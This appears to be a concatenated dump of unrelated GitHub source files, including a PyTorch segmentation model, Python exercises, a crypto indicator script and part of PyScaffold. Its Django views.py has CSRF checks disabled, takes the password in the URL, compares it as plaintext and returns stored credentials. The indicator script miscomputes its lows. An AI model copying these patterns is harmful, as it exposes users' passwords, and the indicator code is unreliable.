W.setdiag(1)\n\n # Non-directed graph.\n # bigger = W.T > W\n # W = W - W.multiply(bigger) + W.T.multiply(bigger)\n #\n # assert W.nnz % 2 == 0\n # assert np.abs(W - W.T).mean() < 1e-10\n # assert type(W) is scipy.sparse.csr.csr_matrix\n return W\n\ndef build_graph(x, k=4):\n N, C, H, W = x.size()\n # tempx = x.permute(0, 2, 3, 1).contiguous().view(-1, C).cpu().numpy()\n # graph = kneighbors_graph(tempx, 8, mode='connectivity', include_self=True)\n # h_idx = np.arange(H)\n # w_idx = np.arange(W)\n # a = np.reshape(np.meshgrid(h_idx, w_idx), (2, -1)).T\n # graph = kneighbors_graph(a, 4, mode='connectivity', include_self=True)\n # adj = graph.tocoo()\n # rowsum = np.array(graph.sum(1))\n # d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n # d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n # d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n # adj = graph.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)\n # adj = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n # indices = torch.from_numpy(\n # np.vstack((adj.row, adj.col)).astype(np.int64))\n # values = torch.from_numpy(adj.data)\n # shape = torch.Size(adj.shape)\n # return torch.from_numpy(adj).cuda()\n graph = grid(H, W)\n # graph = x\n # graph = graph.permute(0, 2, 3, 1).contiguous().view(N*H*W, C)\n dist, idx = distance_sklearn_metrics(graph, k=4, metric='euclidean')\n A = adjacency(dist, idx)\n A = A.to_dense() + torch.eye(A.size(0)).cuda()\n # A = laplacian(A, normalized=True)\n # A = A.tocoo()\n # rowsum = np.array(A.sum(1))\n # d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n # d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n # d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n # A = A.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n D = torch.sum(A, dim=1)\n D = torch.pow(D, -0.5)\n D = torch.diag(D)\n A = torch.mm(torch.mm(A, D).t(), D)\n return A\n # indices = torch.from_numpy(\n # np.vstack((A.row, A.col)).astype(np.int64))\n # values = torch.from_numpy(A.data)\n # shape = torch.Size(A.shape)\n # return torch.sparse.FloatTensor(indices, values, shape).cuda()\n\ndef laplacian(W, normalized=True):\n \"\"\"Return the Laplacian of the weigth matrix.\"\"\"\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nhid)\n\n def forward(self, x, adj):\n identity = x\n x = F.relu(self.gc1(x, adj))\n x = self.gc2(x, adj)\n x = x + identity\n x = F.relu(x, inplace=True)\n return x\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n N, C, H, W = input.size()\n input = input.permute(0, 2, 3, 1).contiguous().view(-1, C)\n support = torch.matmul(input, self.weight)\n output = torch.matmul(adj.float(), support)\n if self.bias is not None:\n output = output + self.bias\n output = output.view(N, H, W, C).permute(0, 3, 1, 2).contiguous()\n return output\n\nclass FCN8sAtOnce(nn.Module):\n def __init__(self, n_classes):\n super(FCN8sAtOnce, self).__init__()\n\n features1 = []\n # conv1\n features1.append(nn.Conv2d(3, 64, 3, padding=100))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(64, 64, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/2\n\n # conv2\n features1.append(nn.Conv2d(64, 128, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(128, 128, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/4\n\n # conv3\n features1.append(nn.Conv2d(128, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(256, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.Conv2d(256, 256, 3, padding=1))\n features1.append(nn.ReLU(inplace=True))\n features1.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/8\n self.features1 = nn.Sequential(*features1)\n\n features2 = []\n # conv4\n features2.append(nn.Conv2d(256, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.Conv2d(512, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.Conv2d(512, 512, 3, padding=1))\n features2.append(nn.ReLU(inplace=True))\n features2.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/16\n self.features2 = nn.Sequential(*features2)\n\n features3 = []\n # conv5\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.Conv2d(512, 512, 3, padding=1))\n features3.append(nn.ReLU(inplace=True))\n features3.append(nn.MaxPool2d(2, stride=2, ceil_mode=True)) # 1/32\n self.features3 = nn.Sequential(*features3)\n\n fc = []\n # fc6\n fc.append(nn.Conv2d(512, 4096, 7))\n fc.append(nn.ReLU(inplace=True))\n fc.append(nn.Dropout2d())\n\n # fc7\n fc.append(nn.Conv2d(4096, 4096, 1))\n fc.append(nn.ReLU(inplace=True))\n fc.append(nn.Dropout2d())\n self.fc = nn.Sequential(*fc)\n\n self.score_fr = nn.Conv2d(4096, n_classes, 1)\n self.score_pool3 = nn.Conv2d(256, n_classes, 1)\n self.score_pool4 = nn.Conv2d(512, n_classes, 1)\n\n self.upscore2 = nn.ConvTranspose2d(\n n_classes, n_classes, 4, stride=2, bias=False)\n self.upscore8 = nn.ConvTranspose2d(\n n_classes, n_classes, 16, stride=8, bias=False)\n self.upscore_pool4 = nn.ConvTranspose2d(\n n_classes, n_classes, 4, stride=2, bias=False)\n freeze(self.upscore2)\n freeze(self.upscore8)\n freeze(self.upscore_pool4)\n\n # self.non_local = _NonLocalBlockND(256)\n self.non_local2 = _NonLocalBlockND(512, bn_layer=False)\n # self.gnn1 = GCN(256, 256)\n # self.gnn2 = GCN(512, 512)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in [self.score_fr, self.score_pool3, self.score_pool4]:\n m.weight.data.zero_()\n m.bias.data.zero_()\n\n for m in [self.upscore2, self.upscore8, self.upscore_pool4]:\n assert m.kernel_size[0] == m.kernel_size[1]\n initial_weight = get_upsampling_weight(\n m.in_channels, m.out_channels, m.kernel_size[0])\n m.weight.data.copy_(initial_weight)\n \n vgg16 = torchvision.models.vgg16(pretrained=True)\n vgg_features = [\n vgg16.features[:17],\n vgg16.features[17:24],\n vgg16.features[24:],\n ]\n features = [\n self.features1,\n self.features2,\n self.features3,\n ]\n\n for l1, l2 in zip(vgg_features, features):\n for ll1, ll2 in zip(l1.children(), l2.children()):\n if isinstance(ll1, nn.Conv2d) and isinstance(ll2, nn.Conv2d):\n assert ll1.weight.size() == ll2.weight.size()\n assert ll1.bias.size() == ll2.bias.size()\n ll2.weight.data.copy_(ll1.weight.data)\n ll2.bias.data.copy_(ll1.bias.data)\n\n # freeze(ll2)\n\n for l1, l2 in zip(vgg16.classifier.children(), self.fc):\n if isinstance(l1, nn.Linear) and isinstance(l2, nn.Conv2d):\n l2.weight.data.copy_(l1.weight.data.view(l2.weight.size()))\n l2.bias.data.copy_(l1.bias.data.view(l2.bias.size()))\n\n # freeze(l2)\n\n def forward(self, x):\n pool3 = self.features1(x) # 1/8\n\n # graph = F.interpolate(x, size=(pool3.size()[2], pool3.size()[3]), mode='bilinear', align_corners=True)\n # adj = build_graph(graph, k=10)\n # pool3 = self.gnn1(pool3, adj)\n # pool3 = self.non_local(pool3)\n # pool3 = pool31 + pool32\n\n pool4 = self.features2(pool3) # 1/16\n\n # graph = F.interpolate(x, size=(pool4.size()[2], pool4.size()[3]), mode='bilinear', align_corners=True)\n # adj = build_graph(graph, k=10)\n # pool4 = self.gnn2(pool4, adj)\n\n pool5 = self.features3(pool4) # 1/32\n pool5 = self.non_local2(pool5)\n out = self.fc(pool5)\n out = self.score_fr(out)\n upscore2 = self.upscore2(out) # 1/16\n\n # score_pool4 = self.score_pool4(pool4 * 0.01) # XXX: scaling to train at once\n score_pool4 = self.score_pool4(pool4)\n score_pool4 = score_pool4[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]\n upscore_pool4 = self.upscore_pool4(upscore2 + score_pool4) # 1/8\n del upscore2\n del score_pool4\n # score_pool3 = self.score_pool3(pool3 * 0.0001) # XXX: scaling to train at once\n score_pool3 = self.score_pool3(pool3)\n score_pool3 = score_pool3[:, :,\n 9:9 + upscore_pool4.size()[2],\n 9:9 + upscore_pool4.size()[3]]\n out = self.upscore8(upscore_pool4 + score_pool3)\n\n out = out[:, :, 31:31 + x.size()[2], 31:31 + x.size()[3]].contiguous()\n\n return out\n\n def get_parameters(self):\n for m in self.modules():\n for p in m.parameters():\n if p.requires_grad:\n yield p","repo_name":"GitLanx/MultiModalSeg","sub_path":"Models/FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":16297,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"21840278831","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom .models import Users\nfrom users.serializers import UsersSerializer\n\n\n# Create your views here.\n@csrf_exempt\ndef user_list(request):\n \"\"\"\n List all code users, or create a new user\n \"\"\"\n if request.method == 'GET':\n users = Users.objects.all()\n serializer = UsersSerializer(users, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse((request))\n serializer = UsersSerializer(data = data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@csrf_exempt\ndef user(request, login_id, login_pw):\n \"\"\"\n get User by login_id, confirm right pw\n \"\"\"\n try:\n db_user = Users.objects.get(login_id=login_id)\n except Users.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = UsersSerializer(db_user)\n return JsonResponse(serializer.data)\n elif request.method == 'POST':\n serializer = UsersSerializer(db_user)\n db_login_pw = serializer.data['login_pw']\n if login_pw == db_login_pw: # 로그인 성공:\n return JsonResponse(serializer.data, status=200)\n else:\n return HttpResponse(status=400)","repo_name":"TrellixVulnTeam/ingook_U4RG","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73703261052","text":"\"\"\"\nAuthor: Shilo Wilson\n\n6) Create three generator expressions and use itertools.chain to attach them together. Print out the result as a list.\n\n7) Create three generator expressions and zip them together. Print out the result as a list.\n\n8) Create three generator expressions and use the appropriate itertools function to get all the combinations of the values.\n Print out the result as a list.\n\"\"\"\nfrom itertools import chain\nfrom itertools import izip\nfrom itertools import product\n\n\ndef oddIntegers(n):\n i=0\n while i <= n:\n yield i*2 + 1\n i += 1\n\n\ndef fact(n):\n i = 0\n prev = 1\n while i <=n:\n yield max(1, i*prev)\n prev = max(1, i*prev)\n i += 1\n\n\ndef squares(n):\n i=0\n while i <= n:\n yield i**2\n i += 1\n\n\ndef main():\n print ('========== Exercises 3.2.6, 3.2.7, 3.2.8 ==========\\n')\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n chained = chain(odd, facts, square)\n print('Chained List: {}'.format(list(chained)))\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n zipped = izip(odd, facts, square)\n print('Zipped List: {}'. format(list(zipped)))\n\n odd = oddIntegers(5)\n facts = fact(5)\n square = squares(5)\n\n prod = product(odd, facts, square)\n print('Products {}'.format(list(prod)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ssw1991/Python-Practice","sub_path":"Module 3 - Shilo Wilson/Level 3.2/3.2.6 _8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72819512573","text":"from PyPDF2 import PdfReader\nimport nltk\nimport heapq\nfrom pdfminer.high_level import extract_text\nfrom nltk import word_tokenize,sent_tokenize\nimport re\nimport PyPDF2\nimport spacy\n\n\nnlp = spacy.load(\"es_core_news_lg\")\nnlp.max_length = 2000000 # 2 millones de caracteres\n\n\ndef generate_resumen(file_path, num_sentences):\n \n # Extraer texto del PDF\n article_text = PdfReader(file_path)\n number_of_pages = len(article_text.pages)\n \n all_text = \"\"\n\n for i in range(number_of_pages):\n page = article_text.pages[i]\n text = page.extract_text()\n all_text += text # Agregar el texto de cada página a la variable `all_text`\n\n \n # Removing Square Brackets and Extra Spaces\n all_text = re.sub(r'\\[[0-9]*\\]', ' ', all_text) \n all_text = re.sub(r'\\s+', ' ', all_text) \n \n formatted_article_text = re.sub('[^a-zA-Z]', ' ', all_text ) \n formatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text) \n #nltk.download()\n #EN ESTA PARTE HACE LA TOKENIZACION \n sentence_list = nltk.sent_tokenize(all_text) \n \n #EN ESTA PARTE ENCUENTRA LA FRECUENCIA DE CADA PALABRA\n stopwords = nltk.corpus.stopwords.words('spanish')\n \n word_frequencies = {} \n for word in nltk.word_tokenize(formatted_article_text): \n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n \n\n if word_frequencies:\n maximum_frequency = max(word_frequencies.values())\n else:\n maximum_frequency = 0\n\n \n for word in word_frequencies.keys(): \n word_frequencies[word] = (word_frequencies[word]/maximum_frequency)\n \n #CALCULA LAS FRASES QUE MÁS SE REPITEN\n sentence_scores = {} \n for sent in sentence_list: \n for word in nltk.word_tokenize(sent.lower()):\n if word in word_frequencies.keys():\n if len(sent.split(' ')) < 40:\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word]\n else:\n sentence_scores[sent] += word_frequencies[word]\n \n #REALIZA EL RESUMEN CON LAS MEJORES FRASES\n \n summary_sentences = heapq.nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n \n summary = ' '.join(summary_sentences) \n \n return summary \n ","repo_name":"GuidoVovk/Django-PNL","sub_path":"text/resume.py","file_name":"resume.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33215683510","text":"#Formatter variable assigned for curly braces\nformatter = \"{} {} {} {}\"\n\n#Display formatted formatter using the .format function to display 1 2 3 4\n# An error occurs if the intergers entered are not up to 4 spaces(index) as per \"{} {} {} {}\"\nprint(formatter.format(1, 2, 3,4))\n#As above, but displaying strings ==> must be four spaces seperated by comma\nprint(formatter.format(\"one\", \"two\", \"three\", \"four\"))\n#As above, but displaying boolean ==> must be four spaces seperated by comma\nprint(formatter.format(True, False, False, True))\n#As above, but this time only displaying the content of the formatter ==> must be four spaces seperated by comma\nprint(formatter.format(formatter, formatter, formatter, formatter))\n#As above, but displaying string sentences in groups of four ==> must be four spaces, seperated by comma\nprint(\n \"Try your\",\n \"Own text here\",\n \"Maybe a poem\",\n \"Or a song about fear\"\n)\n\nprint(formatter.format(\n \"Try your\",\n \"Own text here\",\n \"Maybe a poem\",\n \"Or a song about fear\"\n))","repo_name":"champ886/champ","sub_path":"ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6208939000","text":"def check():\n print(\"Vowel Checker\")\n word = input(\"Enter a word \\n\")\n vowel = ['a', 'e', 'i', 'o', 'u']\n ver = False\n for i in vowel:\n if i in word:\n ver = True\n\n if ver == True:\n print(\"Contains Vowel\")\n if ver == False:\n print(\"No Vowel\")\n\n\ncheck()\n","repo_name":"dollarkid1/pythonProjectSemicolon","sub_path":"Exercises/VowelChecker.py","file_name":"VowelChecker.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21294413269","text":"\"\"\"Chore to send push notifications.\"\"\"\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom pyfcm import FCMNotification\nfrom notifications.models import Notification\n\nfrom helpers.fcm import send_notification_fcm\nfrom helpers.fcm import send_fcm_notification_message\nfrom helpers.fcm import get_rich_notification\nfrom helpers.webpush import send_notification_webpush\n\nclass Command(BaseCommand):\n help = 'Sends push notifications'\n\n def handle(self, *args, **options): # noqa: C901\n \"\"\"Send Push notifications.\"\"\"\n\n webpush_sent = 0\n webpush_total = 0\n fcm_sent = 0\n\n push_service = FCMNotification(api_key=settings.FCM_SERVER_KEY)\n\n # Iterate all unsent notifications\n for notification in Notification.objects.filter(emailed=False)[:1000]:\n\n # Check invalid subscriptions\n if not notification or not notification.actor:\n continue\n\n # Get the user's profile\n profile = notification.recipient.profile\n\n # Check bad users\n if not profile:\n continue\n\n # Stop the spam!\n notification.emailed = True\n notification.save()\n\n # Get rich notification\n data_message = get_rich_notification(notification)\n\n # Retro method for transition\n if profile.fcm_id and profile.fcm_id != '':\n send_fcm_notification_message(push_service, profile.fcm_id, data_message)\n\n # Send FCM push notification\n for device in profile.devices.all():\n fcm_sent += send_notification_fcm(push_service, device, data_message)\n\n # For each web push subscription\n for subscription in profile.web_push_subscriptions.all():\n webpush_total += 1\n webpush_sent += send_notification_webpush(subscription, data_message)\n\n print(\n \"WebPush:\", webpush_sent,\n \"WebPush FAIL:\", webpush_total - webpush_sent,\n \"FCM:\", fcm_sent\n )\n self.stdout.write(self.style.SUCCESS('Push notification chore completed successfully'))\n","repo_name":"DevCom-IITB/instiapp-api","sub_path":"other/management/commands/push-notify.py","file_name":"push-notify.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"74550888573","text":"# loading in modules\nimport sqlite3\nimport pandas as pd\nimport csv\n\n\ndef from_db_table_to_csv(csv_filename):\n dbfile = \"databaseMEUS.db\"\n # Create a SQL connection to the database\n conn = sqlite3.connect(dbfile)\n\n # Get the info_history_table and export it to csv\n sql_query = pd.read_sql_query(\"SELECT * FROM info_history_tab\", conn)\n sql_query.to_csv(csv_filename, index=False)\n\n # Close the connection\n conn.close()\n\n\ndef count_contributing_agents(csv_filename, output_filename):\n with open(csv_filename) as f:\n csv_file = csv.DictReader(f)\n observers = []\n contributing_agents = []\n\n # iterating over each row and append\n # values to empty list\n for row in csv_file:\n observers.append(row['observer'])\n contributing_agents.append(row['a1'])\n contributing_agents.append(row['a2'])\n\n n_observers = len(set(observers))\n n_contributing_agents = len(set(contributing_agents))\n\n header = ['n_observers', 'n_contributors']\n data = [n_observers, n_contributing_agents]\n\n with open(output_filename, 'w', encoding='UTF8') as f:\n writer = csv.writer(f)\n # write the header\n writer.writerow(header)\n # write the data\n writer.writerow(data)","repo_name":"lucregrassi/MEUS","sub_path":"db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5044755480","text":"from functools import reduce\nfrom indicators.price import *\nfrom utils.colors import *\n\nYAML_LIST_NAME = yaml_to_dict(f'/ressources/coin.yaml')\n\n\n\n\n\ndef get_info(df: pd.DataFrame):\n high = reduce(lambda x, y: x if x > y else y, df.HIGH)\n low = reduce(lambda x, y: x if x < y else y, df.HIGH)\n close = df.iloc[len(df)-1].CLOSE\n pivot_point = float(float(high) + float(low) + float(close)) / 3\n\n f_resi = '{:.15f}'.format((2* pivot_point) - float(low))\n f_support = '{:.15f}'.format((2 * pivot_point) - float(high))\n\n s_resi = '{:.15f}'.format(pivot_point + (float(high) - float(low)))\n s_support = '{:.15f}'.format(pivot_point - (float(high) + float(low)))\n\n t_resi = '{:.15f}'.format(float(high) + 2 * (pivot_point - float(low)))\n t_support = '{:.15f}'.format(float(low) - 2 * (float(high) - pivot_point))\n\n print(f'{bcolors.OKGREEN}FIRST RESISTANCE : {f_resi} \\nFIRST SUPPORT : {f_support}{bcolors.ENDC}')\n print(f'{bcolors.OKGREEN}SECOND RESISTANCE : {s_resi} \\nSECOND SUPPORT : {s_support}{bcolors.ENDC}')\n print(f'{bcolors.OKGREEN}THIRD RESISTANCE : {t_resi} \\nTHIRD SUPPORT : {t_support}{bcolors.ENDC}')\n print('')\n\n\n\n\nif __name__ == '__main__':\n # get_price('LTC')\n # for coin in YAML_LIST_NAME['coin']:\n # get_info(get_df(coin))\n get_info(get_df('CRV', hours = 4))\n # print(r.text)","repo_name":"KevTeng/Coin_tracker","sub_path":"indicators/support_resi.py","file_name":"support_resi.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72095544253","text":"# 4 işlem hesap makşinesi\n\nsayi1 = float(input(\"1. sayıyı: \"))\nislem = input(\"Toplama için (+) Çıkarma için (-) Çarpım(*) Bölme(/) girin: \")\nsayi2 = float(input(\"2. sayıyı: \"))\n\nif islem == \"+\" or islem == \"-\" or islem == \"*\" or islem == \"/\":\n if islem == \"+\":\n sonuc = sayi1 + sayi2\n print(\"Toplamı:\",sonuc)\n elif islem == \"-\":\n sonuc = sayi1 - sayi2\n print(\"Farkı:\",sonuc)\n elif islem == \"*\":\n sonuc = sayi1 * sayi2\n print(\"Çarpım\",sonuc)\n elif islem == \"/\":\n sonuc = sayi1 / sayi2\n print(\"Bölüm\",sonuc)\n sonuc= round(sonuc,2)\n print(sayi1 , islem , sayi2 ,\"=\", sonuc)\nelse:\n print(\"Hatalı işlem\")\n\n\n\n\n#Vize-final-Ortalama hesabı\n\nvize = float(input(\"Vize notunuzu giriniz: \"))\nfinal = float(input(\"Final notunuzu giriniz: \"))\nortalama = round((vize * 0.4) + (final * 0.6),2)\nif(ortalama >=80):\n print(\"Harf Notu: AA\")\nelif(ortalama>=70):\n print(\"Harf Notu: BB\")\nelif(ortalama>=60):\n print(\"Harf Notu: CC\")\nelif(ortalama>=50):\n print(\"Harf Notu: DD\")\nelif(ortalama<=49):\n print(\"Harf Notu: FF\")\nx = f\"Ortalama : {ortalama}\"\nprint(x)\n\n","repo_name":"umitcangungor/etiya-6-python-master","sub_path":"2.Gün Pair Çalışması.py","file_name":"2.Gün Pair Çalışması.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1429473360","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.metrics import mean_squared_error as MSE\n\nimport scipy.stats\n\n\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h\n\ndef gen_all_data(df):\n High = df[\"High\"]\n Low = df[\"Low\"]\n Open = df[\"Open\"]\n Close = df[\"Close\"]\n return High,Low,Open,Close\n\n\ndef bollinger(data,window):\n mu = data.rolling(window=window).mean()\n std = data.rolling(window=window).std()\n upper_band = mu + 2*std\n lower_band = mu -2*std\n return mu, upper_band, lower_band\n\n\ndef exp_mov_average(data,window):\n exp = data.ewm(span = window, adjust = False).mean()\n return exp\n\n\ndef get_windows(data,window_size):\n windows = []\n for i in range(len(data)-window_size+1):\n windows.append(data[i: i + window_size])\n return windows\n\n\ndef bollinger_windows(data,window):\n mu,ub,lb = bollinger(data,20)\n ubw = get_windows(ub,5)\n lbw = get_windows(lb,5)\n return ubw,lbw\n\ndef mult_mlp(x_train,x_test,y_train,y_test,iter):\n highs = []\n lows = []\n for i in range(iter):\n mlp = MLPRegressor(hidden_layer_sizes=12,\n activation='relu', solver='lbfgs',\n max_iter = 100, learning_rate= 'constant')\n\n mlp.fit(x_train,y_train)\n predict = mlp.predict(x_test)\n\n top_test = [y_test[i][0] for i in range(len(y_test))]\n bottom_test = [y_test[i][1] for i in range(len(y_test))]\n\n top_pred = [predict[i][0] for i in range(len(predict))]\n bottom_pred = [predict[i][1] for i in range(len(predict))]\n highs.append(top_pred[0])\n lows.append(bottom_pred[0])\n return highs, lows","repo_name":"ggcarvalho/timeseries_final","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71829432253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExposed API for accessing PyScaffold via Python.\n\"\"\"\nfrom __future__ import absolute_import\n\nimport os\nfrom datetime import date\nfrom functools import reduce\n\nimport pyscaffold\n\nfrom .. import info, repo, utils\nfrom ..exceptions import (\n DirectoryAlreadyExists,\n DirectoryDoesNotExist,\n GitNotConfigured,\n GitNotInstalled,\n InvalidIdentifier\n)\nfrom ..log import logger\nfrom ..structure import (\n apply_update_rules,\n create_structure,\n define_structure\n)\nfrom . import helpers\n\n# -------- Actions --------\n\nDEFAULT_OPTIONS = {'update': False,\n 'force': False,\n 'description': 'Add a short description here!',\n 'url': 'http://...',\n 'license': 'none',\n 'version': pyscaffold.__version__,\n 'classifiers': utils.list2str(\n ['Development Status :: 4 - Beta',\n 'Programming Language :: Python'],\n indent=4, brackets=False, quotes=False, sep='')}\n\n\ndef get_default_options(struct, given_opts):\n \"\"\"Compute all the options that can be automatically derived.\n\n This function uses all the available information to generate sensible\n defaults. Several options that can be derived are computed when possible.\n\n Args:\n struct (dict): project representation as (possibly) nested\n :obj:`dict`.\n given_opts (dict): given options, see :obj:`create_project` for\n an extensive list.\n\n Returns:\n dict: options with default values set\n\n Raises:\n :class:`~.DirectoryDoesNotExist`: when PyScaffold is told to\n update an inexistent directory\n :class:`~.GitNotInstalled`: when git command is not available\n :class:`~.GitNotConfigured`: when git does not know user information\n\n Note:\n This function uses git to determine some options, such as author name\n and email.\n \"\"\"\n\n # This function uses information from git, so make sure it is available\n _verify_git()\n\n opts = DEFAULT_OPTIONS.copy()\n opts.update(given_opts)\n project_name = opts['project']\n\n opts.setdefault('package', utils.make_valid_identifier(opts['project']))\n opts.setdefault('author', info.username())\n opts.setdefault('email', info.email())\n opts.setdefault('release_date', date.today().strftime('%Y-%m-%d'))\n opts.setdefault('year', date.today().year)\n opts.setdefault('title',\n '='*len(opts['project']) + '\\n' + opts['project'] + '\\n' +\n '='*len(opts['project']))\n\n # Initialize empty list of all requirements and extensions\n # (since not using deep_copy for the DEFAULT_OPTIONS, better add compound\n # values inside this function)\n opts.setdefault('requirements', list())\n opts.setdefault('extensions', list())\n\n opts.setdefault('root_pkg', opts['package'])\n opts.setdefault('namespace_pkg', opts['package'])\n\n if opts['update']:\n if not os.path.exists(project_name):\n raise DirectoryDoesNotExist(\n \"Project {project} does not exist and thus cannot be \"\n \"updated!\".format(project=project_name))\n opts = info.project(opts)\n # Reset project name since the one from setup.cfg might be different\n opts['project'] = project_name\n\n opts.setdefault('pretend', False)\n\n return (struct, opts)\n\n\ndef verify_options_consistency(struct, opts):\n \"\"\"Perform some sanity checks about the given options.\"\"\"\n if os.path.exists(opts['project']):\n if not opts['update'] and not opts['force']:\n raise DirectoryAlreadyExists(\n \"Directory {dir} already exists! Use the `update` option to \"\n \"update an existing project or the `force` option to \"\n \"overwrite an existing directory.\".format(dir=opts['project']))\n if not utils.is_valid_identifier(opts['package']):\n raise InvalidIdentifier(\n \"Package name {} is not a valid \"\n \"identifier.\".format(opts['package']))\n\n return (struct, opts)\n\n\ndef init_git(struct, opts):\n \"\"\"Add revision control to the generated files.\"\"\"\n if not opts['update'] and not repo.is_git_repo(opts['project']):\n repo.init_commit_repo(opts['project'], struct,\n log=True, pretend=opts.get('pretend'))\n\n return (struct, opts)\n\n\n# -------- API --------\n\nDEFAULT_ACTIONS = [\n get_default_options,\n verify_options_consistency,\n define_structure,\n apply_update_rules,\n create_structure,\n init_git\n]\n\n\ndef discover_actions(extensions):\n \"\"\"Retrieve the action list.\n\n This is done by concatenating the default list with the one generated after\n activating the extensions.\n\n Args:\n extensions (list): list of functions responsible for activating the\n extensions.\n\n Returns:\n list: scaffold actions.\n 